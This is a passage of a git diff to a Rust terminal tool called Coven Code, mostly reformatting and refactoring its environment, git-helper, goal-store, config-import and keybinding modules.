std::env::var("AWS_DEFAULT_REGION")) + .unwrap_or_else(|_| "us-east-1".to_string()) +} + +// --------------------------------------------------------------------------- +// Tests +// --------------------------------------------------------------------------- + +#[cfg(test)] +mod tests { + use super::*; + + // --- normalize_name --- + + #[test] + fn normalize_replaces_dashes_and_dots() { + assert_eq!(normalize_name("my-feature"), "MY_FEATURE"); + assert_eq!(normalize_name("tengu.tide.elm"), "TENGU_TIDE_ELM"); + assert_eq!(normalize_name("a-b.c"), "A_B_C"); + } + + #[test] + fn normalize_strips_special_chars() { + assert_eq!(normalize_name("some:special!name"), "SOMESPECIALNAME"); + } + + #[test] + fn normalize_preserves_underscores() { + assert_eq!(normalize_name("already_upper"), "ALREADY_UPPER"); + } + + // --- is_env_truthy --- + + #[test] + fn truthy_values() { + for v in &["1", "true", "True", "TRUE", "yes", "YES", "on", "ON"] { + assert!(is_env_truthy(Some(v)), "expected truthy for {:?}", v); + } + } + + #[test] + fn falsy_values_are_not_truthy() { + for v in &["0", "false", "no", "off", "", "anything"] { + assert!(!is_env_truthy(Some(v)), "expected non-truthy for {:?}", v); + } + assert!(!is_env_truthy(None)); + } + + // --- is_env_defined_falsy --- + + #[test] + fn defined_falsy_values() { + for v in &["0", "false", "False", "FALSE", "no", "NO", "off", "OFF"] { + assert!( + is_env_defined_falsy(Some(v)), + "expected defined-falsy for {:?}", + v + ); + } + } + + #[test] + fn non_falsy_values() { + for v in &["1", "true", "yes", "on", ""] { + assert!( + !is_env_defined_falsy(Some(v)), + "expected non-defined-falsy for {:?}", + v + ); + } + assert!(!is_env_defined_falsy(None)); + } + + // --- parse_env_vars --- + + #[test] + fn parse_env_vars_basic() { + let args = vec!["KEY=VALUE".to_string(), "FOO=bar=baz".to_string()]; + let map = parse_env_vars(&args).unwrap(); + assert_eq!(map["KEY"], "VALUE"); + // value may contain `=` + assert_eq!(map["FOO"], "bar=baz"); + } + + #[test] + fn parse_env_vars_error_on_no_equals() { + let args = vec!["NOEQUALSSIGN".to_string()]; + assert!(parse_env_vars(&args).is_err()); + } + + // --- get_aws_region --- + + #[test] + fn aws_region_fallback() { + // Ensure the fallback works when neither env var is set. + // We can't easily unset env vars in tests, so we just verify the + // function returns a non-empty string. + let region = get_aws_region(); + assert!(!region.is_empty()); + } + + // --- get_dynamic_config --- + + #[test] + fn dynamic_config_returns_default_when_unset() { + // Use an unlikely key so we don't collide with a real env var. + let val: u32 = get_dynamic_config("__test_unset_key_xyzzy__", 42u32); + assert_eq!(val, 42); + } +} diff --git a/src-rust/crates/core/src/format_utils.rs b/src-rust/crates/core/src/format_utils.rs index 7d9745e..1e87b99 100644 --- a/src-rust/crates/core/src/format_utils.rs +++ b/src-rust/crates/core/src/format_utils.rs @@ -45,7 +45,11 @@ pub fn format_tokens(count: u64) -> String { /// Format a token/cost summary line for the status bar. /// Example: "3.2K tokens · $0.04" pub fn format_usage_summary(tokens: u64, cost_cents: f64) -> String { - format!("{} tokens · {}", format_tokens(tokens), format_cost_usd(cost_cents)) + format!( + "{} tokens · {}", + format_tokens(tokens), + format_cost_usd(cost_cents) + ) } /// Format a relative time string (for session listings). diff --git a/src-rust/crates/core/src/git_utils.rs b/src-rust/crates/core/src/git_utils.rs index 61e6483..624551a 100644 --- a/src-rust/crates/core/src/git_utils.rs +++ b/src-rust/crates/core/src/git_utils.rs @@ -1,212 +1,219 @@ -//! Git utilities for Coven Code. -//! Mirrors src/utils/git.ts (926 lines) and src/utils/git/ subdirectory. - -use std::path::{Path, PathBuf}; -use std::process::Command; - -// --------------------------------------------------------------------------- -// Repository discovery -// --------------------------------------------------------------------------- - -/// Walk up the directory tree to find the nearest `.git` directory. -pub fn get_repo_root(start: &Path) -> Option { - let mut current = start.to_path_buf(); - loop { - let git_dir = current.join(".git"); - if git_dir.exists() { - return Some(current); - } - if !current.pop() { - return None; - } - } -} - -/// Run a git command in `repo_root` and return stdout as a String. -/// Returns empty string on failure (non-zero exit, not-a-repo, etc.). -fn git_output(repo_root: &Path, args: &[&str]) -> String { - Command::new("git") - .current_dir(repo_root) - .args(args) - .output() - .ok() - .filter(|o| o.status.success()) - .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) - .unwrap_or_default() -} - -// --------------------------------------------------------------------------- -// Branch / status -// --------------------------------------------------------------------------- - -/// Return the current branch name (or "HEAD" if detached). -pub fn get_current_branch(repo_root: &Path) -> String { - let branch = git_output(repo_root, &["rev-parse", "--abbrev-ref", "HEAD"]); - if branch.is_empty() { "HEAD".to_string() } else { branch } -} - -/// Return list of files modified (staged or unstaged). -pub fn list_modified_files(repo_root: &Path) -> Vec { - let output = git_output(repo_root, &["diff", "--name-only", "HEAD"]); - if output.is_empty() { - return Vec::new(); - } - output.lines().map(|l| repo_root.join(l)).collect() -} - -// --------------------------------------------------------------------------- -// Diff -// --------------------------------------------------------------------------- - -/// Return the staged diff (index vs HEAD). -pub fn get_staged_diff(repo_root: &Path) -> String { - git_output(repo_root, &["diff", "--cached"]) -} - -/// Return the unstaged diff (working tree vs index). -pub fn get_unstaged_diff(repo_root: &Path) -> String { - git_output(repo_root, &["diff"]) -} - -/// Return the diff for a specific file since a given commit (or HEAD). -pub fn get_file_diff(repo_root: &Path, path: &Path, since_commit: Option<&str>) -> String { - let commit = since_commit.unwrap_or("HEAD"); - let path_str = path.to_string_lossy(); - git_output(repo_root, &["diff", commit, "--", &path_str]) -} - -// --------------------------------------------------------------------------- -// History -// --------------------------------------------------------------------------- - -/// A single git commit summary. -#[derive(Debug, Clone)] -pub struct CommitInfo { - pub hash: String, - pub short_hash: String, - pub author: String, - pub date: String, - pub subject: String, -} - -/// Return the last `n` commits in the repository. -pub fn get_commit_history(repo_root: &Path, n: usize) -> Vec { - let format = "%H%x1f%h%x1f%an%x1f%ad%x1f%s%x1e"; - let n_str = n.to_string(); - let output = git_output(repo_root, &[ - "log", - &format!("-{}", n_str), - &format!("--format={}", format), - "--date=short", - ]); - - output - .split('\x1e') - .filter(|s| !s.trim().is_empty()) - .filter_map(|entry| { - let parts: Vec<&str> = entry.trim().splitn(5, '\x1f').collect(); - if parts.len() == 5 { - Some(CommitInfo { - hash: parts[0].to_string(), - short_hash: parts[1].to_string(), - author: parts[2].to_string(), - date: parts[3].to_string(), - subject: parts[4].to_string(), - }) - } else { - None - } - }) - .collect() -} - -// --------------------------------------------------------------------------- -// Branch operations -// --------------------------------------------------------------------------- - -/// Create and switch to a new branch. -pub fn create_branch(repo_root: &Path, name: &str) -> bool { - Command::new("git") - .current_dir(repo_root) - .args(["checkout", "-b", name]) - .status() - .map(|s| s.success()) - .unwrap_or(false) -} - -/// Switch to an existing branch. -pub fn switch_branch(repo_root: &Path, name: &str) -> bool { - Command::new("git") - .current_dir(repo_root) - .args(["checkout", name]) - .status() - .map(|s| s.success()) - .unwrap_or(false) -} - -// --------------------------------------------------------------------------- -// Stash -// --------------------------------------------------------------------------- - -/// Stash uncommitted changes with an optional message. -pub fn stash(repo_root: &Path, message: Option<&str>) -> bool { - let mut args = vec!["stash", "push"]; - let msg_flag; - if let Some(m) = message { - msg_flag = format!("-m {}", m); - args.push(&msg_flag); - } - Command::new("git") - .current_dir(repo_root) - .args(&args) - .status() - .map(|s| s.success()) - .unwrap_or(false) -} - -/// Pop the top stash entry. -pub fn stash_pop(repo_root: &Path) -> bool { - Command::new("git") - .current_dir(repo_root) - .args(["stash", "pop"]) - .status() - .map(|s| s.success()) - .unwrap_or(false) -} - -// --------------------------------------------------------------------------- -// .gitignore check -// --------------------------------------------------------------------------- - -/// Returns `true` if the given path is git-ignored. -pub fn is_ignored(repo_root: &Path, path: &Path) -> bool { - let path_str = path.to_string_lossy(); - Command::new("git") - .current_dir(repo_root) - .args(["check-ignore", "-q", &path_str]) - .status() - .map(|s| s.success()) - .unwrap_or(false) -} - -#[cfg(test)] -mod tests { - use super::*; - use std::path::Path; - - #[test] - fn get_repo_root_finds_git() { - // Run from within the src-rust workspace which has .git - let result = get_repo_root(Path::new(".")); - // Should find the repo root (may or may not exist in test env) - // Just verify it doesn't panic. - let _ = result; - } - - #[test] - fn commit_info_parse() { - // smoke test — just ensure it doesn't panic with empty output - let commits = get_commit_history(Path::new("."), 0); - assert!(commits.is_empty()); - } -} +//! Git utilities for Coven Code. +//! Mirrors src/utils/git.ts (926 lines) and src/utils/git/ subdirectory. + +use std::path::{Path, PathBuf}; +use std::process::Command; + +// --------------------------------------------------------------------------- +// Repository discovery +// --------------------------------------------------------------------------- + +/// Walk up the directory tree to find the nearest `.git` directory. +pub fn get_repo_root(start: &Path) -> Option { + let mut current = start.to_path_buf(); + loop { + let git_dir = current.join(".git"); + if git_dir.exists() { + return Some(current); + } + if !current.pop() { + return None; + } + } +} + +/// Run a git command in `repo_root` and return stdout as a String. +/// Returns empty string on failure (non-zero exit, not-a-repo, etc.). +fn git_output(repo_root: &Path, args: &[&str]) -> String { + Command::new("git") + .current_dir(repo_root) + .args(args) + .output() + .ok() + .filter(|o| o.status.success()) + .map(|o| String::from_utf8_lossy(&o.stdout).trim().to_string()) + .unwrap_or_default() +} + +// --------------------------------------------------------------------------- +// Branch / status +// --------------------------------------------------------------------------- + +/// Return the current branch name (or "HEAD" if detached). +pub fn get_current_branch(repo_root: &Path) -> String { + let branch = git_output(repo_root, &["rev-parse", "--abbrev-ref", "HEAD"]); + if branch.is_empty() { + "HEAD".to_string() + } else { + branch + } +} + +/// Return list of files modified (staged or unstaged). +pub fn list_modified_files(repo_root: &Path) -> Vec { + let output = git_output(repo_root, &["diff", "--name-only", "HEAD"]); + if output.is_empty() { + return Vec::new(); + } + output.lines().map(|l| repo_root.join(l)).collect() +} + +// --------------------------------------------------------------------------- +// Diff +// --------------------------------------------------------------------------- + +/// Return the staged diff (index vs HEAD). +pub fn get_staged_diff(repo_root: &Path) -> String { + git_output(repo_root, &["diff", "--cached"]) +} + +/// Return the unstaged diff (working tree vs index). +pub fn get_unstaged_diff(repo_root: &Path) -> String { + git_output(repo_root, &["diff"]) +} + +/// Return the diff for a specific file since a given commit (or HEAD). +pub fn get_file_diff(repo_root: &Path, path: &Path, since_commit: Option<&str>) -> String { + let commit = since_commit.unwrap_or("HEAD"); + let path_str = path.to_string_lossy(); + git_output(repo_root, &["diff", commit, "--", &path_str]) +} + +// --------------------------------------------------------------------------- +// History +// --------------------------------------------------------------------------- + +/// A single git commit summary. +#[derive(Debug, Clone)] +pub struct CommitInfo { + pub hash: String, + pub short_hash: String, + pub author: String, + pub date: String, + pub subject: String, +} + +/// Return the last `n` commits in the repository. +pub fn get_commit_history(repo_root: &Path, n: usize) -> Vec { + let format = "%H%x1f%h%x1f%an%x1f%ad%x1f%s%x1e"; + let n_str = n.to_string(); + let output = git_output( + repo_root, + &[ + "log", + &format!("-{}", n_str), + &format!("--format={}", format), + "--date=short", + ], + ); + + output + .split('\x1e') + .filter(|s| !s.trim().is_empty()) + .filter_map(|entry| { + let parts: Vec<&str> = entry.trim().splitn(5, '\x1f').collect(); + if parts.len() == 5 { + Some(CommitInfo { + hash: parts[0].to_string(), + short_hash: parts[1].to_string(), + author: parts[2].to_string(), + date: parts[3].to_string(), + subject: parts[4].to_string(), + }) + } else { + None + } + }) + .collect() +} + +// --------------------------------------------------------------------------- +// Branch operations +// --------------------------------------------------------------------------- + +/// Create and switch to a new branch. +pub fn create_branch(repo_root: &Path, name: &str) -> bool { + Command::new("git") + .current_dir(repo_root) + .args(["checkout", "-b", name]) + .status() + .map(|s| s.success()) + .unwrap_or(false) +} + +/// Switch to an existing branch. +pub fn switch_branch(repo_root: &Path, name: &str) -> bool { + Command::new("git") + .current_dir(repo_root) + .args(["checkout", name]) + .status() + .map(|s| s.success()) + .unwrap_or(false) +} + +// --------------------------------------------------------------------------- +// Stash +// --------------------------------------------------------------------------- + +/// Stash uncommitted changes with an optional message. +pub fn stash(repo_root: &Path, message: Option<&str>) -> bool { + let mut args = vec!["stash", "push"]; + let msg_flag; + if let Some(m) = message { + msg_flag = format!("-m {}", m); + args.push(&msg_flag); + } + Command::new("git") + .current_dir(repo_root) + .args(&args) + .status() + .map(|s| s.success()) + .unwrap_or(false) +} + +/// Pop the top stash entry. +pub fn stash_pop(repo_root: &Path) -> bool { + Command::new("git") + .current_dir(repo_root) + .args(["stash", "pop"]) + .status() + .map(|s| s.success()) + .unwrap_or(false) +} + +// --------------------------------------------------------------------------- +// .gitignore check +// --------------------------------------------------------------------------- + +/// Returns `true` if the given path is git-ignored. +pub fn is_ignored(repo_root: &Path, path: &Path) -> bool { + let path_str = path.to_string_lossy(); + Command::new("git") + .current_dir(repo_root) + .args(["check-ignore", "-q", &path_str]) + .status() + .map(|s| s.success()) + .unwrap_or(false) +} + +#[cfg(test)] +mod tests { + use super::*; + use std::path::Path; + + #[test] + fn get_repo_root_finds_git() { + // Run from within the src-rust workspace which has .git + let result = get_repo_root(Path::new(".")); + // Should find the repo root (may or may not exist in test env) + // Just verify it doesn't panic. + let _ = result; + } + + #[test] + fn commit_info_parse() { + // smoke test — just ensure it doesn't panic with empty output + let commits = get_commit_history(Path::new("."), 0); + assert!(commits.is_empty()); + } +} diff --git a/src-rust/crates/core/src/goal.rs b/src-rust/crates/core/src/goal.rs index ad4cea0..4d59c60 100644 --- a/src-rust/crates/core/src/goal.rs +++ b/src-rust/crates/core/src/goal.rs @@ -36,7 +36,7 @@ impl GoalStatus { } } - pub fn from_str(s: &str) -> Option { + pub fn parse(s: &str) -> Option { match s { "active" => Some(GoalStatus::Active), "paused" => Some(GoalStatus::Paused), @@ -138,8 +138,7 @@ pub struct GoalStore { impl GoalStore { /// Open (or create) the goal database. pub fn open(db_path: &std::path::Path) -> Result { - let conn = rusqlite::Connection::open(db_path) - .map_err(|e| GoalError::Db(e.to_string()))?; + let conn = rusqlite::Connection::open(db_path).map_err(|e| GoalError::Db(e.to_string()))?; conn.execute_batch( "CREATE TABLE IF NOT EXISTS goals ( @@ -239,8 +238,7 @@ impl GoalStore { id: row.get(0)?, session_id: row.get(1)?, objective: row.get(2)?, - status: GoalStatus::from_str(&status_str) - .unwrap_or(GoalStatus::Paused), + status: GoalStatus::parse(&status_str).unwrap_or(GoalStatus::Paused), token_budget: row.get(4)?, tokens_used: row.get::<_, i64>(5)? as u64, time_used_secs: row.get::<_, i64>(6)? as u64, @@ -346,7 +344,7 @@ fn uuid_v4() -> String { format!( "{:08x}-{:04x}-4{:03x}-{:04x}-{:012x}", (h1 >> 32) as u32, - (h1 >> 16) as u16 & 0xffff, + (h1 >> 16) as u16, (h1) as u16 & 0x0fff, ((h2 >> 48) as u16 & 0x3fff) | 0x8000, h2 & 0x0000_ffff_ffff_ffff, @@ -481,7 +479,9 @@ mod tests { fn test_replace_goal() { let store = open_tmp(); store.set_goal("sess1", "first goal", None).unwrap(); - store.set_goal("sess1", "second goal", Some(100_000)).unwrap(); + store + .set_goal("sess1", "second goal", Some(100_000)) + .unwrap(); let g = store.get_goal("sess1").unwrap(); assert_eq!(g.objective, "second goal"); assert_eq!(g.token_budget, Some(100_000)); diff --git a/src-rust/crates/core/src/ide.rs b/src-rust/crates/core/src/ide.rs index 328ea04..936f1f6 100644 --- a/src-rust/crates/core/src/ide.rs +++ b/src-rust/crates/core/src/ide.rs @@ -38,7 +38,9 @@ impl IdeKind { Some("code-insiders --install-extension coven-code.coven-code".to_string()) } Self::Cursor => Some("cursor --install-extension coven-code.coven-code".to_string()), - Self::Windsurf => Some("windsurf --install-extension coven-code.coven-code".to_string()), + Self::Windsurf => { + Some("windsurf --install-extension coven-code.coven-code".to_string()) + } Self::VSCodium => Some("codium --install-extension coven-code.coven-code".to_string()), _ => None, } diff --git a/src-rust/crates/core/src/import_config.rs b/src-rust/crates/core/src/import_config.rs index 0a259ca..5056dbc 100644 --- a/src-rust/crates/core/src/import_config.rs +++ b/src-rust/crates/core/src/import_config.rs @@ -300,6 +300,17 @@ struct SettingsPreviewOutcome { skipped_count: usize, } +#[derive(Default)] +struct SettingsPreviewState { + preview_fields: Vec, + imported_fields: Vec, + skipped_fields: Vec, + imported_count: usize, + replaced_count: usize, + kept_count: usize, + skipped_count: usize, +} + fn map_settings_preview( source: &Value, current: &Value, @@ -309,16 +320,10 @@ fn map_settings_preview( .as_object() .ok_or_else(|| anyhow!("source settings.json must be a JSON object"))?; - let mut preview_fields = Vec::new(); - let mut imported_fields = Vec::new(); - let mut skipped_fields = Vec::new(); - let mut imported_count = 0; - let mut replaced_count = 0; - let mut kept_count = 0; - let mut skipped_count = 0; + let mut state = SettingsPreviewState::default(); if source_obj.contains_key("model") { - preview_fields.push(PreviewField { + state.preview_fields.push(PreviewField { name: "model".to_string(), action: PreviewAction::Skip, reason: Some( @@ -326,10 +331,10 @@ fn map_settings_preview( .to_string(), ), }); - skipped_fields.push("model".to_string()); - skipped_count += 1; + state.skipped_fields.push("model".to_string()); + state.skipped_count += 1; } else { - preview_fields.push(PreviewField { + state.preview_fields.push(PreviewField { name: "model".to_string(), action: PreviewAction::Keep, reason: Some("source file does not provide this field".to_string()), @@ -339,12 +344,7 @@ fn map_settings_preview( map_theme_field( source_obj.get("theme"), current.pointer("/config/theme"), - &mut preview_fields, - &mut imported_fields, - &mut imported_count, - &mut replaced_count, - &mut skipped_fields, - &mut skipped_count, + &mut state, target, ); @@ -355,10 +355,7 @@ fn map_settings_preview( output_style_value, current.pointer("/config/output_style"), "output_style", - &mut preview_fields, - &mut imported_fields, - &mut imported_count, - &mut replaced_count, + &mut state, || { if let Some(style) = output_style_value.and_then(Value::as_str) { target.config.output_style = Some(style.to_string()); @@ -369,17 +366,17 @@ fn map_settings_preview( map_executable_config_field( source_obj.get("mcpServers"), "mcpServers", - &mut preview_fields, - &mut skipped_fields, - &mut skipped_count, + &mut state.preview_fields, + &mut state.skipped_fields, + &mut state.skipped_count, ); map_executable_config_field( source_obj.get("hooks"), "hooks", - &mut preview_fields, - &mut skipped_fields, - &mut skipped_count, + &mut state.preview_fields, + &mut state.skipped_fields, + &mut state.skipped_count, ); for key in [ @@ -396,35 +393,35 @@ fn map_settings_preview( "effortLevel", ] { if source_obj.contains_key(key) { - preview_fields.push(PreviewField { + state.preview_fields.push(PreviewField { name: key.to_string(), action: PreviewAction::Skip, reason: Some(skip_reason_for_key(key).to_string()), }); - skipped_fields.push(key.to_string()); - skipped_count += 1; + state.skipped_fields.push(key.to_string()); + state.skipped_count += 1; } } - for field in &mut preview_fields { + for field in &mut state.preview_fields { if field.action == PreviewAction::Skip { continue; } if let Some(reason) = &field.reason { if reason == "source file does not provide this field" { - kept_count += 1; + state.kept_count += 1; } } } Ok(SettingsPreviewOutcome { - preview_fields, - imported_fields, - skipped_fields, - imported_count, - replaced_count, - kept_count, - skipped_count, + preview_fields: state.preview_fields, + imported_fields: state.imported_fields, + skipped_fields: state.skipped_fields, + imported_count: state.imported_count, + replaced_count: state.replaced_count, + kept_count: state.kept_count, + skipped_count: state.skipped_count, }) } @@ -432,10 +429,7 @@ fn map_scalar_field( source_value: Option<&Value>, current_value: Option<&Value>, name: &str, - preview_fields: &mut Vec, - imported_fields: &mut Vec, - imported_count: &mut usize, - replaced_count: &mut usize, + state: &mut SettingsPreviewState, apply: F, ) where F: FnOnce(), @@ -447,20 +441,20 @@ fn map_scalar_field( Some(_) => PreviewAction::Replace, None => PreviewAction::Import, }; - preview_fields.push(PreviewField { + state.preview_fields.push(PreviewField { name: name.to_string(), action, reason: None, }); - imported_fields.push(name.to_string()); + state.imported_fields.push(name.to_string()); if action == PreviewAction::Replace { - *replaced_count += 1; + state.replaced_count += 1; } else { - *imported_count += 1; + state.imported_count += 1; } apply(); } - None => preview_fields.push(PreviewField { + None => state.preview_fields.push(PreviewField { name: name.to_string(), action: PreviewAction::Keep, reason: Some("source file does not provide this field".to_string()), @@ -471,12 +465,7 @@ fn map_scalar_field( fn map_theme_field( source_value: Option<&Value>, current_value: Option<&Value>, - preview_fields: &mut Vec, - imported_fields: &mut Vec, - imported_count: &mut usize, - replaced_count: &mut usize, - skipped_fields: &mut Vec, - skipped_count: &mut usize, + state: &mut SettingsPreviewState, target: &mut Settings, ) { match source_value.and_then(Value::as_str) { @@ -497,29 +486,29 @@ fn map_theme_field( Some(_) => PreviewAction::Replace, None => PreviewAction::Import, }; - preview_fields.push(PreviewField { + state.preview_fields.push(PreviewField { name: "theme".to_string(), action, reason: None, }); target.config.theme = theme; - imported_fields.push("theme".to_string()); + state.imported_fields.push("theme".to_string()); if action == PreviewAction::Replace { - *replaced_count += 1; + state.replaced_count += 1; } else { - *imported_count += 1; + state.imported_count += 1; } } else { - preview_fields.push(PreviewField { + state.preview_fields.push(PreviewField { name: "theme".to_string(), action: PreviewAction::Skip, reason: Some("theme value cannot be mapped to the current program".to_string()), }); - skipped_fields.push("theme".to_string()); - *skipped_count += 1; + state.skipped_fields.push("theme".to_string()); + state.skipped_count += 1; } } - None => preview_fields.push(PreviewField { + None => state.preview_fields.push(PreviewField { name: "theme".to_string(), action: PreviewAction::Keep, reason: Some("source file does not provide this field".to_string()), diff --git a/src-rust/crates/core/src/keybindings.rs b/src-rust/crates/core/src/keybindings.rs index 71de15a..f053733 100644 --- a/src-rust/crates/core/src/keybindings.rs +++ b/src-rust/crates/core/src/keybindings.rs @@ -1,919 +1,936 @@ -//! Configurable keyboard shortcuts system - -use indexmap::IndexMap; -use serde::{Deserialize, Serialize}; -use std::path::Path; -use tracing::warn; - -/// All keybinding contexts -#[derive(Debug, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)] -#[serde(rename_all = "PascalCase")] -pub enum KeyContext { - Global, - Chat, - Autocomplete, - Confirmation, - Help, - Transcript, - HistorySearch, - Task, - ThemePicker, - Settings, - Tabs, - Attachments, - Footer, - MessageSelector, - DiffDialog, - ModelPicker, - Select, - Plugin, -} - -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct ParsedKeystroke { - pub key: String, // normalized key name - pub ctrl: bool, - pub alt: bool, - pub shift: bool, - pub meta: bool, -} - -pub type Chord = Vec; - -#[derive(Debug, Clone, Serialize, Deserialize)] -pub struct ParsedBinding { - pub chord: Chord, - pub action: Option, // None = unbound - pub context: KeyContext, -} - -/// Parse a keystroke string like "ctrl+shift+enter" into ParsedKeystroke -pub fn parse_keystroke(s: &str) -> Option { - let s = s.trim().to_lowercase(); - let mut ctrl = false; - let mut alt = false; - let mut shift = false; - let mut meta = false; - let mut key_parts: Vec<&str> = Vec::new(); - - for part in s.split('+') { - let part = part.trim(); - if part.is_empty() { - continue; - } - match part { - "ctrl" | "control" => ctrl = true, - "alt" | "opt" | "option" => alt = true, - "shift" => shift = true, - "meta" | "cmd" | "command" | "super" | "win" => meta = true, - _ => key_parts.push(part), - } - } - - if key_parts.is_empty() { - return None; - } - - let key = normalize_key(key_parts.join("+").as_str()); - Some(ParsedKeystroke { - key, - ctrl, - alt, - shift, - meta, - }) -} - -fn format_chord_string(chord: &Chord) -> String { - chord - .iter() - .map(|ks| { - let mut parts = Vec::new(); - if ks.ctrl { - parts.push("ctrl"); - } - if ks.alt { - parts.push("alt"); - } - if ks.shift { - parts.push("shift"); - } - if ks.meta { - parts.push("meta"); - } - parts.push(&ks.key); - parts.join("+") - }) - .collect::>() - .join(" ") -} -fn normalize_key(k: &str) -> String { - match k { - "esc" | "escape" => "escape".to_string(), - "return" | "enter" => "enter".to_string(), - "del" | "delete" => "delete".to_string(), - "backspace" | "bs" => "backspace".to_string(), - "space" | " " => "space".to_string(), - "up" => "up".to_string(), - "down" => "down".to_string(), - "left" => "left".to_string(), - "right" => "right".to_string(), - "pageup" | "pgup" => "pageup".to_string(), - "pagedown" | "pgdn" | "pgdown" => "pagedown".to_string(), - "home" => "home".to_string(), - "end" => "end".to_string(), - "tab" => "tab".to_string(), - k => k.to_string(), - } -} - -/// Parse a chord (space-separated keystrokes like "ctrl+k ctrl+d") -pub fn parse_chord(s: &str) -> Option { - let keystrokes: Vec = - s.split_whitespace().filter_map(parse_keystroke).collect(); - if keystrokes.is_empty() { - None - } else { - Some(keystrokes) - } -} - -/// Keys that cannot be rebound -pub const NON_REBINDABLE: &[&str] = &["ctrl+c", "ctrl+d", "ctrl+m"]; - -/// Default keybindings with comprehensive coverage of text editing, navigation, vim, and TUI actions -/// -/// # Standard Keybindings (Phase 1 Implementation) -/// - **Ctrl+L**: Clear current input line (like bash) [Chat context only due to conflict] -/// - **Ctrl+Shift+A**: Open the model picker -/// - **Ctrl+K**: Open the command palette -/// - **Ctrl+U**: Kill input from cursor to start of line (Emacs-style) -/// - **Alt+←/Alt+→**: Navigate to previous/next message in transcript -/// - **Ctrl+. (Ctrl+>)**: Jump to next error/issue in messages -/// - **Ctrl+Shift+.**: Jump to previous error/issue -/// - **Shift+Tab**: Reverse indent/unindent in input (cycle permission mode) -/// - **Ctrl+H**: Delete character before cursor (Chat context, Emacs-style) -/// - **Alt+H**: Open help (alternative to F1) -/// - **Ctrl+O**: Jump back in history (command history) -/// - **Ctrl+I**: Jump forward in history -/// - **Alt+D**: Delete word forward (already implemented) -/// - **Ctrl+V**: Paste from clipboard (already implemented) -pub fn default_bindings() -> Vec { - let defaults: &[(&str, &str, KeyContext)] = &[ - // ========== GLOBAL CONTROL ========== - // ("ctrl+c", "interrupt", KeyContext::Global), // Handled directly in handle_key_event for two-press confirmation - // ("ctrl+d", "exit", KeyContext::Global), // Handled directly in handle_key_event for two-press confirmation - ("ctrl+l", "redraw", KeyContext::Global), - ("ctrl+r", "historySearch", KeyContext::Global), - ("ctrl+b", "createBranch", KeyContext::Global), - ("alt+h", "openHelp", KeyContext::Global), - - // ========== CHAT / INPUT CONTEXT ========== - // Message submission - ("enter", "submit", KeyContext::Chat), - - // Newline insertion (Shift+Enter / Ctrl+J for multi-line composing) - ("shift+enter", "newline", KeyContext::Chat), - // Fallback for terminals that do not support the kitty keyboard protocol - // (e.g. Terminal.app, older iTerm2, Windows Terminal, or SSH sessions). - // Without the protocol, Shift+Enter is sent as a raw newline byte (0x0A, - // LF); crossterm reports that as KeyCode::Char('j') with CONTROL because - // Ctrl+J == 0x0A in ASCII. When the protocol is enabled (see - // PushKeyboardEnhancementFlags in tui/src/lib.rs), terminals like Ghostty - // send a proper CSI-u sequence with the Shift modifier instead, so this - // fallback is not needed there. Keep it as a compatibility belt-and-braces - // for terminals that do not support the protocol. - ("ctrl+j", "newline", KeyContext::Chat), - - // Line start/end navigation - ("home", "goLineStart", KeyContext::Chat), - ("cmd+left", "goLineStart", KeyContext::Chat), - ("ctrl+a", "goLineStart", KeyContext::Chat), - ("end", "goLineEnd", KeyContext::Chat), - ("cmd+right", "goLineEnd", KeyContext::Chat), - ("ctrl+e", "goLineEnd", KeyContext::Chat), - - // Word navigation - ("ctrl+left", "moveWordBackward", KeyContext::Chat), - ("ctrl+right", "moveWordForward", KeyContext::Chat), - - // Word deletion - ("ctrl+w", "killWord", KeyContext::Chat), - ("alt+backspace", "killWord", KeyContext::Chat), - ("alt+d", "deleteWord", KeyContext::Chat), - - // Character/line deletion - ("ctrl+h", "deleteCharBefore", KeyContext::Chat), - ("ctrl+u", "killToStart", KeyContext::Chat), - ("ctrl+l", "clearLine", KeyContext::Chat), - - // History navigation - ("up", "historyPrev", KeyContext::Chat), - ("ctrl+o", "historyPrev", KeyContext::Chat), - ("down", "historyNext", KeyContext::Chat), - ("ctrl+i", "historyNext", KeyContext::Chat), - - // Message navigation - ("alt+left", "previousMessage", KeyContext::Chat), - ("alt+right", "nextMessage", KeyContext::Chat), - - // Error/issue navigation - ("ctrl+.", "jumpToNextError", KeyContext::Chat), - ("ctrl+shift+.", "jumpToPreviousError", KeyContext::Chat), - - // Searching - ("ctrl+f", "findInMessage", KeyContext::Chat), - ("ctrl+shift+f", "globalSearch", KeyContext::Chat), - ("f3", "findNext", KeyContext::Chat), - ("ctrl+]", "findNext", KeyContext::Chat), - ("shift+f3", "findPrev", KeyContext::Chat), - ("ctrl+[", "findPrev", KeyContext::Chat), - ("ctrl+g", "goToLine", KeyContext::Chat), - - // Indentation - ("tab", "indent", KeyContext::Chat), - ("shift+tab", "reverseIndent", KeyContext::Chat), - - // Scrolling - ("pageup", "scrollUp", KeyContext::Chat), - ("pagedown", "scrollDown", KeyContext::Chat), - - // App shortcuts - ("ctrl+shift+a", "openModelPicker", KeyContext::Chat), - ("ctrl+k", "openCommandPalette", KeyContext::Chat), - - // ========== CONFIRMATION DIALOGS ========== - ("y", "yes", KeyContext::Confirmation), - ("enter", "yes", KeyContext::Confirmation), - ("n", "no", KeyContext::Confirmation), - ("escape", "no", KeyContext::Confirmation), - ("up", "prevOption", KeyContext::Confirmation), - ("down", "nextOption", KeyContext::Confirmation), - - // ========== HELP OVERLAY ========== - ("escape", "close", KeyContext::Help), - ("q", "close", KeyContext::Help), - ("up", "scrollUp", KeyContext::Help), - ("down", "scrollDown", KeyContext::Help), - ("pageup", "pageUp", KeyContext::Help), - ("pagedown", "pageDown", KeyContext::Help), - - // ========== HISTORY SEARCH ========== - ("up", "prevResult", KeyContext::HistorySearch), - ("down", "nextResult", KeyContext::HistorySearch), - ("enter", "select", KeyContext::HistorySearch), - ("escape", "cancel", KeyContext::HistorySearch), - ("tab", "togglePreview", KeyContext::HistorySearch), - - // ========== TRANSCRIPT / MESSAGE SELECTION ========== - ("up", "prevMessage", KeyContext::Transcript), - ("down", "nextMessage", KeyContext::Transcript), - ("pageup", "pageUp", KeyContext::Transcript), - ("pagedown", "pageDown", KeyContext::Transcript), - ("home", "goStart", KeyContext::Transcript), - ("end", "goEnd", KeyContext::Transcript), - ("enter", "selectMessage", KeyContext::Transcript), - ("escape", "cancel", KeyContext::Transcript), - - // ========== MESSAGE SELECTOR OVERLAY ========== - ("up", "prevMessage", KeyContext::MessageSelector), - ("down", 